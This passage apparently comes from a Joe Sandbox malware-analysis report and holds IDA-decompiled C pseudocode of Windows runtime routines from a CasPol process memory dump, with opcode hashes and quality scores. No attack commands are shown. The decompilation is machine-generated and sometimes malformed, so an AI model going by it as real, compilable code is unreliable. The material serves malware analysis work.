                                                                								_t149 = 0xc0000017;
                                                                								 *(_t237 - 0x44) = 0xc0000017;
                                                                							} else {
                                                                								_t149 =  *(_t237 - 0x44);
                                                                							}
                                                                							__eflags = _t149;
                                                                							if(__eflags >= 0) {
                                                                								L8:
                                                                								 *(_t237 - 0x64) = _t235;
                                                                								_t150 =  *0x1717b10; // 0x0
                                                                								 *(_t237 - 0x4c) = _t150;
                                                                								_push(_t237 - 0x74);
                                                                								_push(_t237 - 0x39);
                                                                								_push(_t237 - 0x58);
                                                                								_t193 = E0165A61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
                                                                								 *(_t237 - 0x44) = _t193;
                                                                								__eflags = _t193;
                                                                								if(_t193 < 0) {
                                                                									L30:
                                                                									E0163FFB0(_t193, _t235, 0x1718550);
                                                                									__eflags = _t235 - _t237 - 0x38;
                                                                									if(_t235 != _t237 - 0x38) {
                                                                										_t235 =  *(_t237 - 0x48);
                                                                										L016477F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
                                                                									} else {
                                                                										_t235 =  *(_t237 - 0x48);
                                                                									}
                                                                									__eflags =  *(_t237 - 0x6c);
                                                                									if( *(_t237 - 0x6c) != 0) {
                                                                										L016477F0(_t235, _t236,  *(_t237 - 0x6c));
                                                                									}
                                                                									__eflags = _t193;
                                                                									if(_t193 >= 0) {
                                                                										goto L4;
                                                                									} else {
                                                                										goto L5;
                                                                									}
                                                                								}
                                                                								_t204 =  *0x1717b04; // 0x1
                                                                								 *(_t235 + 8) = _t204;
                                                                								__eflags =  *((char*)(_t237 - 0x39));
                                                                								if( *((char*)(_t237 - 0x39)) != 0) {
                                                                									 *(_t235 + 4) = 1;
                                                                									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
                                                                									_t161 =  *0x1717b10; // 0x0
                                                                									 *(_t237 - 0x4c) = _t161;
                                                                								} else {
                                                                									 *(_t235 + 4) = _t236;
                                                                									 *(_t235 + 0xc) =  *(_t237 - 0x58);
                                                                								}
                                                                								 *((intOrPtr*)(_t237 - 0x54)) = E016637C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
                                                                								_t224 = _t236;
                                                                								 *(_t237 - 0x40) = _t236;
                                                                								 *(_t237 - 0x50) = _t236;
                                                                								while(1) {
                                                                									_t163 =  *(_t235 + 8);
                                                                									__eflags = _t224 - _t163;
                                                                									if(_t224 >= _t163) {
                                                                										break;
                                                                									}
                                                                									_t228 =  *0x1717b9c; // 0x0
                                                                									_t214 = L01644620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
                                                                									 *(_t237 - 0x78) = _t214;
                                                                									__eflags = _t214;
                                                                									if(_t214 == 0) {
                                                                										L52:
                                                                										_t193 = 0xc0000017;
                                                                										L19:
                                                                										 *(_t237 - 0x44) = _t193;
                                                                										L20:
                                                                										_t206 =  *(_t237 - 0x40);
                                                                										__eflags = _t206;
                                                                										if(_t206 == 0) {
                                                                											L26:
                                                                											__eflags = _t193;
                                                                											if(_t193 < 0) {
                                                                												E016637F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
                                                                												__eflags =  *((char*)(_t237 - 0x39));
                                                                												if( *((char*)(_t237 - 0x39)) != 0) {
                                                                													 *0x1717b10 =  *0x1717b10 - 8;
                                                                												}
                                                                											} else {
                                                                												_t169 =  *(_t237 - 0x68);
                                                                												__eflags = _t169;
                                                                												if(_t169 != 0) {
                                                                													 *0x1717b04 =  *0x1717b04 - _t169;
                                                                												}
                                                                											}
                                                                											__eflags = _t193;
                                                                											if(_t193 >= 0) {
                                                                												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
                                                                											}
                                                                											goto L30;
                                                                										}
                                                                										_t226 = _t206 * 0xc;
                                                                										__eflags = _t226;
                                                                										_t194 =  *(_t237 - 0x48);
                                                                										do {
                                                                											 *(_t237 - 0x40) = _t206 - 1;
                                                                											_t226 = _t226 - 0xc;
                                                                											 *(_t237 - 0x4c) = _t226;
                                                                											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
                                                                											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
                                                                												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
                                                                												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
                                                                													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
                                                                													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
                                                                													__eflags =  *((char*)(_t237 - 0x39));
                                                                													if( *((char*)(_t237 - 0x39)) == 0) {
                                                                														_t171 = _t210;
                                                                													} else {
                                                                														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
                                                                														L016477F0(_t194, _t236, _t210 - 8);
                                                                														_t171 =  *(_t237 - 0x50);
                                                                													}
                                                                													L48:
                                                                													L016477F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
                                                                													L46:
                                                                													_t206 =  *(_t237 - 0x40);
                                                                													_t226 =  *(_t237 - 0x4c);
                                                                													goto L24;
                                                                												}
                                                                												 *0x1717b08 =  *0x1717b08 + 1;
                                                                												goto L24;
                                                                											}
                                                                											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
                                                                											__eflags = _t171;
                                                                											if(_t171 != 0) {
                                                                												__eflags =  *((char*)(_t237 - 0x39));
                                                                												if( *((char*)(_t237 - 0x39)) == 0) {
                                                                													goto L48;
                                                                												}
                                                                												E016657C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
                                                                												goto L46;
                                                                											}
                                                                											L24:
                                                                											__eflags = _t206;
                                                                										} while (_t206 != 0);
                                                                										_t193 =  *(_t237 - 0x44);
                                                                										goto L26;
                                                                									}
                                                                									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
                                                                									 *(_t237 - 0x7c) = _t232;
                                                                									 *(_t232 - 4) = _t214;
                                                                									 *(_t237 - 4) = _t236;
                                                                									E0166F3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
                                                                									_t238 = _t238 + 0xc;
                                                                									 *(_t237 - 4) = 0xfffffffe;
                                                                									_t215 =  *(_t237 - 0x48);
                                                                									__eflags = _t193;
                                                                									if(_t193 < 0) {
                                                                										L016477F0(_t215, _t236,  *(_t237 - 0x78));
                                                                										goto L20;
                                                                									}
                                                                									__eflags =  *((char*)(_t237 - 0x39));
                                                                									if( *((char*)(_t237 - 0x39)) != 0) {
                                                                										_t233 = E0165A44B( *(_t237 - 0x4c));
                                                                										 *(_t237 - 0x50) = _t233;
                                                                										__eflags = _t233;
                                                                										if(_t233 == 0) {
                                                                											L016477F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
                                                                											goto L52;
                                                                										}
                                                                										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
                                                                										L17:
                                                                										_t234 =  *(_t237 - 0x40);
                                                                										_t218 = _t234 * 0xc;
                                                                										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
                                                                										 *(_t218 + _t235 + 0x10) = _t236;
                                                                										_t224 = _t234 + 1;
                                                                										 *(_t237 - 0x40) = _t224;
                                                                										 *(_t237 - 0x50) = _t224;
                                                                										_t193 =  *(_t237 - 0x44);
                                                                										continue;
                                                                									}
                                                                									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
                                                                									goto L17;
                                                                								}
                                                                								 *_t235 = _t236;
                                                                								_t165 = 0x10 + _t163 * 0xc;
                                                                								__eflags = _t165;
                                                                								_push(_t165);
                                                                								_push(_t235);
                                                                								_push(0x23);
                                                                								_push(0xffffffff);
                                                                								_t193 = E016696C0();
                                                                								goto L19;
                                                                							} else {
                                                                								goto L50;
                                                                							}
                                                                						}
                                                                						_t235 = _t237 - 0x38;
                                                                						 *(_t237 - 0x60) = _t235;
                                                                						goto L8;
                                                                					}
                                                                					goto L4;
                                                                				}
                                                                			}


                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5744675362da91c9734312dce856c424de496282beb9180d3e50edec905f097e
                                                                • Instruction ID: 881dfcfcd1ab021e7dcb6bbea2fe75ac2ee13d719d91e0f2e3cf4a413598ece7
                                                                • Opcode Fuzzy Hash: 5744675362da91c9734312dce856c424de496282beb9180d3e50edec905f097e
                                                                • Instruction Fuzzy Hash: 9BB13C70E00219DFDB25DFA9CD84AEEBBBABF85304F10422DE505AB345D774A945CB50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 67%
                                                                			E0165513A(intOrPtr __ecx, void* __edx) {
                                                                				signed int _v8;
                                                                				signed char _v16;
                                                                				intOrPtr _v20;
                                                                				intOrPtr _v24;
                                                                				char _v28;
                                                                				signed int _v32;
                                                                				signed int _v36;
                                                                				signed int _v40;
                                                                				intOrPtr _v44;
                                                                				intOrPtr _v48;
                                                                				char _v63;
                                                                				char _v64;
                                                                				signed int _v72;
                                                                				signed int _v76;
                                                                				signed int _v80;
                                                                				signed int _v84;
                                                                				signed int _v88;
                                                                				signed char* _v92;
                                                                				signed int _v100;
                                                                				signed int _v104;
                                                                				char _v105;
                                                                				void* __ebx;
                                                                				void* __edi;
                                                                				void* __esi;
                                                                				void* _t157;
                                                                				signed int _t159;
                                                                				signed int _t160;
                                                                				unsigned int* _t161;
                                                                				intOrPtr _t165;
                                                                				signed int _t172;
                                                                				signed char* _t181;
                                                                				intOrPtr _t189;
                                                                				intOrPtr* _t200;
                                                                				signed int _t202;
                                                                				signed int _t203;
                                                                				char _t204;
                                                                				signed int _t207;
                                                                				signed int _t208;
                                                                				void* _t209;
                                                                				intOrPtr _t210;
                                                                				signed int _t212;
                                                                				signed int _t214;
                                                                				signed int _t221;
                                                                				signed int _t222;
                                                                				signed int _t226;
                                                                				intOrPtr* _t232;
                                                                				signed int _t233;
                                                                				signed int _t234;
                                                                				intOrPtr _t237;
                                                                				intOrPtr _t238;
                                                                				intOrPtr _t240;
                                                                				void* _t245;
                                                                				signed int _t246;
                                                                				signed int _t247;
                                                                				void* _t248;
                                                                				void* _t251;
                                                                				void* _t252;
                                                                				signed int _t253;
                                                                				signed int _t255;
                                                                				signed int _t256;
                                                                
                                                                				_t255 = (_t253 & 0xfffffff8) - 0x6c;
                                                                				_v8 =  *0x171d360 ^ _t255;
                                                                				_v32 = _v32 & 0x00000000;
                                                                				_t251 = __edx;
                                                                				_t237 = __ecx;
                                                                				_t212 = 6;
                                                                				_t245 =  &_v84;
                                                                				_t207 =  *((intOrPtr*)(__ecx + 0x48));
                                                                				_v44 =  *((intOrPtr*)(__edx + 0xc8));
                                                                				_v48 = __ecx;
                                                                				_v36 = _t207;
                                                                				_t157 = memset(_t245, 0, _t212 << 2);
                                                                				_t256 = _t255 + 0xc;
                                                                				_t246 = _t245 + _t212;
                                                                				if(_t207 == 2) {
                                                                					_t247 =  *(_t237 + 0x60);
                                                                					_t208 =  *(_t237 + 0x64);
                                                                					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
                                                                					_t159 =  *((intOrPtr*)(_t237 + 0x58));
                                                                					_v104 = _t159;
                                                                					_v76 = _t159;
                                                                					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
                                                                					_v100 = _t160;
                                                                					_v72 = _t160;
                                                                					L19:
                                                                					_v80 = _t208;
                                                                					_v84 = _t247;
                                                                					L8:
                                                                					_t214 = 0;
                                                                					if( *(_t237 + 0x74) > 0) {
                                                                						_t82 = _t237 + 0x84; // 0x124
                                                                						_t161 = _t82;
                                                                						_v92 = _t161;
                                                                						while( *_t161 >> 0x1f != 0) {
                                                                							_t200 = _v92;
                                                                							if( *_t200 == 0x80000000) {
                                                                								break;
                                                                							}
                                                                							_t214 = _t214 + 1;
                                                                							_t161 = _t200 + 0x10;
                                                                							_v92 = _t161;
                                                                							if(_t214 <  *(_t237 + 0x74)) {
                                                                								continue;
                                                                							}
                                                                							goto L9;
                                                                						}
                                                                						_v88 = _t214 << 4;
                                                                						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
                                                                						_t165 = 0;
                                                                						asm("adc eax, [ecx+edx+0x7c]");
                                                                						_v24 = _t165;
                                                                						_v28 = _v40;
                                                                						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
                                                                						_t221 = _v40;
                                                                						_v16 =  *_v92;
                                                                						_v32 =  &_v28;
                                                                						if( *(_t237 + 0x4e) >> 0xf == 0) {
                                                                							goto L9;
                                                                						}
                                                                						_t240 = _v48;
                                                                						if( *_v92 != 0x80000000) {
                                                                							goto L9;
                                                                						}
                                                                						 *((intOrPtr*)(_t221 + 8)) = 0;
                                                                						 *((intOrPtr*)(_t221 + 0xc)) = 0;
                                                                						 *((intOrPtr*)(_t221 + 0x14)) = 0;
                                                                						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
                                                                						_t226 = 0;
                                                                						_t181 = _t251 + 0x66;
                                                                						_v88 = 0;
                                                                						_v92 = _t181;
                                                                						do {
                                                                							if( *((char*)(_t181 - 2)) == 0) {
                                                                								goto L31;
                                                                							}
                                                                							_t226 = _v88;
                                                                							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
                                                                								_t181 = E0166D0F0(1, _t226 + 0x20, 0);
                                                                								_t226 = _v40;
                                                                								 *(_t226 + 8) = _t181;
                                                                								 *((intOrPtr*)(_t226 + 0xc)) = 0;
                                                                								L34:
                                                                								if(_v44 == 0) {
                                                                									goto L9;
                                                                								}
                                                                								_t210 = _v44;
                                                                								_t127 = _t210 + 0x1c; // 0x1c
                                                                								_t249 = _t127;
                                                                								E01642280(_t181, _t127);
                                                                								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
                                                                								_t185 =  *((intOrPtr*)(_t210 + 0x94));
                                                                								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
                                                                									L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
                                                                								}
                                                                								_t189 = L01644620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
                                                                								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
                                                                								if(_t189 != 0) {
                                                                									 *((intOrPtr*)(_t189 + 8)) = _v20;
                                                                									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
                                                                									_t232 =  *((intOrPtr*)(_t210 + 0x94));
                                                                									 *_t232 = _t232 + 0x10;
                                                                									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
                                                                									E0166F3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
                                                                									_t256 = _t256 + 0xc;
                                                                								}
                                                                								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
                                                                								E0163FFB0(_t210, _t249, _t249);
                                                                								_t222 = _v76;
                                                                								_t172 = _v80;
                                                                								_t208 = _v84;
                                                                								_t247 = _v88;
                                                                								L10:
                                                                								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
                                                                								_v44 = _t238;
                                                                								if(_t238 != 0) {
                                                                									 *0x171b1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
                                                                									_v44();
                                                                								}
                                                                								_pop(_t248);
                                                                								_pop(_t252);
                                                                								_pop(_t209);
                                                                								return E0166B640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
                                                                							}
                                                                							_t181 = _v92;
                                                                							L31:
                                                                							_t226 = _t226 + 1;
                                                                							_t181 =  &(_t181[0x18]);
                                                                							_v88 = _t226;
                                                                							_v92 = _t181;
                                                                						} while (_t226 < 4);
                                                                						goto L34;
                                                                					}
                                                                					L9:
                                                                					_t172 = _v104;
                                                                					_t222 = _v100;
                                                                					goto L10;
                                                                				}
                                                                				_t247 = _t246 | 0xffffffff;
                                                                				_t208 = _t247;
                                                                				_v84 = _t247;
                                                                				_v80 = _t208;
                                                                				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
                                                                					_t233 = _v72;
                                                                					_v105 = _v64;
                                                                					_t202 = _v76;
                                                                				} else {
                                                                					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
                                                                					_v105 = 1;
                                                                					if(_v63 <= _t204) {
                                                                						_v63 = _t204;
                                                                					}
                                                                					_t202 = _v76 |  *(_t251 + 0x40);
                                                                					_t233 = _v72 |  *(_t251 + 0x44);
                                                                					_t247 =  *(_t251 + 0x38);
                                                                					_t208 =  *(_t251 + 0x3c);
                                                                					_v76 = _t202;
                                                                					_v72 = _t233;
                                                                					_v84 = _t247;
                                                                					_v80 = _t208;
                                                                				}
                                                                				_v104 = _t202;
                                                                				_v100 = _t233;
                                                                				if( *((char*)(_t251 + 0xc4)) != 0) {
                                                                					_t237 = _v48;
                                                                					_v105 = 1;
                                                                					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
                                                                						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
                                                                						_t237 = _v48;
                                                                					}
                                                                					_t203 = _t202 |  *(_t251 + 0xb8);
                                                                					_t234 = _t233 |  *(_t251 + 0xbc);
                                                                					_t247 = _t247 &  *(_t251 + 0xb0);
                                                                					_t208 = _t208 &  *(_t251 + 0xb4);
                                                                					_v104 = _t203;
                                                                					_v76 = _t203;
                                                                					_v100 = _t234;
                                                                					_v72 = _t234;
                                                                					_v84 = _t247;
                                                                					_v80 = _t208;
                                                                				}
                                                                				if(_v105 == 0) {
                                                                					_v36 = _v36 & 0x00000000;
                                                                					_t208 = 0;
                                                                					_t247 = 0;
                                                                					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
                                                                					goto L19;
                                                                				} else {
                                                                					_v36 = 1;
                                                                					goto L8;
                                                                				}
                                                                			}

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 057adf4452c98c57417b0e2225367bcd35d053d379178a882dc84130a90e0c1a
                                                                • Instruction ID: ec69cb211479a199d8f05a1cd857bcf5bcc93c6cd884b3b7ea9c23aefe07e3fe
                                                                • Opcode Fuzzy Hash: 057adf4452c98c57417b0e2225367bcd35d053d379178a882dc84130a90e0c1a
                                                                • Instruction Fuzzy Hash: 54C113755083818FD755CF28C980A5AFBF1BF88304F148A6EF99A8B362D771E945CB42
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 74%
                                                                			E016503E2(signed int __ecx, signed int __edx) {
                                                                				signed int _v8;
                                                                				signed int _v12;
                                                                				signed int _v16;
                                                                				signed int _v20;
                                                                				signed int _v24;
                                                                				signed int _v28;
                                                                				signed int _v32;
                                                                				signed int _v36;
                                                                				intOrPtr _v40;
                                                                				signed int _v44;
                                                                				signed int _v48;
                                                                				char _v52;
                                                                				char _v56;
                                                                				char _v64;
                                                                				void* __ebx;
                                                                				void* __edi;
                                                                				void* __esi;
                                                                				signed int _t56;
                                                                				signed int _t58;
                                                                				char* _t64;
                                                                				intOrPtr _t65;
                                                                				signed int _t74;
                                                                				signed int _t79;
                                                                				char* _t83;
                                                                				intOrPtr _t84;
                                                                				signed int _t93;
                                                                				signed int _t94;
                                                                				signed char* _t95;
                                                                				signed int _t99;
                                                                				signed int _t100;
                                                                				signed char* _t101;
                                                                				signed int _t105;
                                                                				signed int _t119;
                                                                				signed int _t120;
                                                                				void* _t122;
                                                                				signed int _t123;
                                                                				signed int _t127;
                                                                
                                                                				_v8 =  *0x171d360 ^ _t127;
                                                                				_t119 = __ecx;
                                                                				_t105 = __edx;
                                                                				_t118 = 0;
                                                                				_v20 = __edx;
                                                                				_t120 =  *(__ecx + 0x20);
                                                                				if(E01650548(__ecx, 0) != 0) {
                                                                					_t56 = 0xc000022d;
                                                                					L23:
                                                                					return E0166B640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
                                                                				} else {
                                                                					_v12 = _v12 | 0xffffffff;
                                                                					_t58 = _t120 + 0x24;
                                                                					_t109 =  *(_t120 + 0x18);
                                                                					_t118 = _t58;
                                                                					_v16 = _t58;
                                                                					E0163B02A( *(_t120 + 0x18), _t118, 0x14a5);
                                                                					_v52 = 0x18;
                                                                					_v48 = 0;
                                                                					0x840 = 0x40;
                                                                					if( *0x1717c1c != 0) {
                                                                					}
                                                                					_v40 = 0x840;
                                                                					_v44 = _t105;
                                                                					_v36 = 0;
                                                                					_v32 = 0;
                                                                					if(E01647D50() != 0) {
                                                                						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                					} else {
                                                                						_t64 = 0x7ffe0384;
                                                                					}
                                                                					if( *_t64 != 0) {
                                                                						_t65 =  *[fs:0x30];
                                                                						__eflags =  *(_t65 + 0x240) & 0x00000004;
                                                                						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
                                                                							_t100 = E01647D50();
                                                                							__eflags = _t100;
                                                                							if(_t100 == 0) {
                                                                								_t101 = 0x7ffe0385;
                                                                							} else {
                                                                								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                                							}
                                                                							__eflags =  *_t101 & 0x00000020;
                                                                							if(( *_t101 & 0x00000020) != 0) {
                                                                								_t118 = _t118 | 0xffffffff;
                                                                								_t109 = 0x1485;
                                                                								E016A7016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
                                                                							}
                                                                						}
                                                                					}
                                                                					_t105 = 0;
                                                                					while(1) {
                                                                						_push(0x60);
                                                                						_push(5);
                                                                						_push( &_v64);
                                                                						_push( &_v52);
                                                                						_push(0x100021);
                                                                						_push( &_v12);
                                                                						_t122 = E01669830();
                                                                						if(_t122 >= 0) {
                                                                							break;
                                                                						}
                                                                						__eflags = _t122 - 0xc0000034;
                                                                						if(_t122 == 0xc0000034) {
                                                                							L38:
                                                                							_t120 = 0xc0000135;
                                                                							break;
                                                                						}
                                                                						__eflags = _t122 - 0xc000003a;
                                                                						if(_t122 == 0xc000003a) {
                                                                							goto L38;
                                                                						}
                                                                						__eflags = _t122 - 0xc0000022;
                                                                						if(_t122 != 0xc0000022) {
                                                                							break;
                                                                						}
                                                                						__eflags = _t105;
                                                                						if(__eflags != 0) {
                                                                							break;
                                                                						}
                                                                						_t109 = _t119;
                                                                						_t99 = E016A69A6(_t119, __eflags);
                                                                						__eflags = _t99;
                                                                						if(_t99 == 0) {
                                                                							break;
                                                                						}
                                                                						_t105 = _t105 + 1;
                                                                					}
                                                                					if( !_t120 >= 0) {
                                                                						L22:
                                                                						_t56 = _t120;
                                                                						goto L23;
                                                                					}
                                                                					if( *0x1717c04 != 0) {
                                                                						_t118 = _v12;
                                                                						_t120 = E016AA7AC(_t119, _t118, _t109);
                                                                						__eflags = _t120;
                                                                						if(_t120 >= 0) {
                                                                							goto L10;
                                                                						}
                                                                						__eflags =  *0x1717bd8;
                                                                						if( *0x1717bd8 != 0) {
                                                                							L20:
                                                                							if(_v12 != 0xffffffff) {
                                                                								_push(_v12);
                                                                								E016695D0();
                                                                							}
                                                                							goto L22;
                                                                						}
                                                                					}
                                                                					L10:
                                                                					_push(_v12);
                                                                					_t105 = _t119 + 0xc;
                                                                					_push(0x1000000);
                                                                					_push(0x10);
                                                                					_push(0);
                                                                					_push(0);
                                                                					_push(0xf);
                                                                					_push(_t105);
                                                                					_t120 = E016699A0();
                                                                					if(_t120 < 0) {
                                                                						__eflags = _t120 - 0xc000047e;
                                                                						if(_t120 == 0xc000047e) {
                                                                							L51:
                                                                							_t74 = E016A3540(_t120);
                                                                							_t119 = _v16;
                                                                							_t120 = _t74;
                                                                							L52:
                                                                							_t118 = 0x1485;
                                                                							E0162B1E1(_t120, 0x1485, 0, _t119);
                                                                							goto L20;
                                                                						}
                                                                						__eflags = _t120 - 0xc000047f;
                                                                						if(_t120 == 0xc000047f) {
                                                                							goto L51;
                                                                						}
                                                                						__eflags = _t120 - 0xc0000462;
                                                                						if(_t120 == 0xc0000462) {
                                                                							goto L51;
                                                                						}
                                                                						_t119 = _v16;
                                                                						__eflags = _t120 - 0xc0000017;
                                                                						if(_t120 != 0xc0000017) {
                                                                							__eflags = _t120 - 0xc000009a;
                                                                							if(_t120 != 0xc000009a) {
                                                                								__eflags = _t120 - 0xc000012d;
                                                                								if(_t120 != 0xc000012d) {
                                                                									_v28 = _t119;
                                                                									_push( &_v56);
                                                                									_push(1);
                                                                									_v24 = _t120;
                                                                									_push( &_v28);
                                                                									_push(1);
                                                                									_push(2);
                                                                									_push(0xc000007b);
                                                                									_t79 = E0166AAF0();
                                                                									__eflags = _t79;
                                                                									if(_t79 >= 0) {
                                                                										__eflags =  *0x1718474 - 3;
                                                                										if( *0x1718474 != 3) {
                                                                											 *0x17179dc =  *0x17179dc + 1;
                                                                										}
                                                                									}
                                                                								}
                                                                							}
                                                                						}
                                                                						goto L52;
                                                                					}
                                                                					if(E01647D50() != 0) {
                                                                						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                					} else {
                                                                						_t83 = 0x7ffe0384;
                                                                					}
                                                                					if( *_t83 != 0) {
                                                                						_t84 =  *[fs:0x30];
                                                                						__eflags =  *(_t84 + 0x240) & 0x00000004;
                                                                						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
                                                                							_t94 = E01647D50();
                                                                							__eflags = _t94;
                                                                							if(_t94 == 0) {
                                                                								_t95 = 0x7ffe0385;
                                                                							} else {
                                                                								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                                							}
                                                                							__eflags =  *_t95 & 0x00000020;
                                                                							if(( *_t95 & 0x00000020) != 0) {
                                                                								E016A7016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
                                                                							}
                                                                						}
                                                                					}
                                                                					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
                                                                						if( *0x1718708 != 0) {
                                                                							_t118 =  *0x7ffe0330;
                                                                							_t123 =  *0x1717b00; // 0x0
                                                                							asm("ror esi, cl");
                                                                							 *0x171b1e0(_v12, _v20, 0x20);
                                                                							_t93 =  *(_t123 ^  *0x7ffe0330)();
                                                                							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
                                                                							asm("sbb esi, esi");
                                                                							_t120 =  ~_t50 & _t93;
                                                                						} else {
                                                                							_t120 = 0;
                                                                						}
                                                                					}
                                                                					if( !_t120 >= 0) {
                                                                						L19:
                                                                						_push( *_t105);
                                                                						E016695D0();
                                                                						 *_t105 =  *_t105 & 0x00000000;
                                                                						goto L20;
                                                                					}
                                                                					_t120 = E01637F65(_t119);
                                                                					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
                                                                						__eflags = _t120;
                                                                						if(_t120 < 0) {
                                                                							goto L19;
                                                                						}
                                                                						 *(_t119 + 0x64) = _v12;
                                                                						goto L22;
                                                                					}
                                                                					goto L19;
                                                                				}
                                                                			}

                                                                0x01694e10
                                                                0x01694e1c
                                                                0x01694e1f
                                                                0x01694e35
                                                                0x01694e35
                                                                0x01694e1f
                                                                0x01694df8
                                                                0x016504f1
                                                                0x016504fa
                                                                0x01694e3f
                                                                0x01694e47
                                                                0x01694e5b
                                                                0x01694e61
                                                                0x01694e67
                                                                0x01694e69
                                                                0x01694e71
                                                                0x01694e73
                                                                0x01650500
                                                                0x01650500
                                                                0x01650500
                                                                0x016504fa
                                                                0x01650508
                                                                0x0165051d
                                                                0x0165051d
                                                                0x0165051f
                                                                0x01650524
                                                                0x00000000
                                                                0x01650524
                                                                0x01650515
                                                                0x01650517
                                                                0x01694e7a
                                                                0x01694e7c
                                                                0x00000000
                                                                0x00000000
                                                                0x01694e85
                                                                0x00000000
                                                                0x01694e85
                                                                0x00000000
                                                                0x01650517

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 38cc3e8da8a100694d577ee98a1dd68d9caa1d6d3be0c7cbcd01c2eb264795d3
                                                                • Instruction ID: a248b0550df47f67fdf1be500bc9e62cce20075a9eebb5429fec8f84360c4775
                                                                • Opcode Fuzzy Hash: 38cc3e8da8a100694d577ee98a1dd68d9caa1d6d3be0c7cbcd01c2eb264795d3
                                                                • Instruction Fuzzy Hash: BD910132E00615EFEF329A6CCE44BAD7BA9AB05724F050265FE10AB2D1DB74DD02C785
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 100%
                                                                			E0165EBB0(signed int* _a4, intOrPtr _a8, intOrPtr* _a12, signed short* _a16, unsigned int _a20) {
                                                                				signed short* _v8;
                                                                				intOrPtr _v12;
                                                                				intOrPtr _v16;
                                                                				unsigned int _v20;
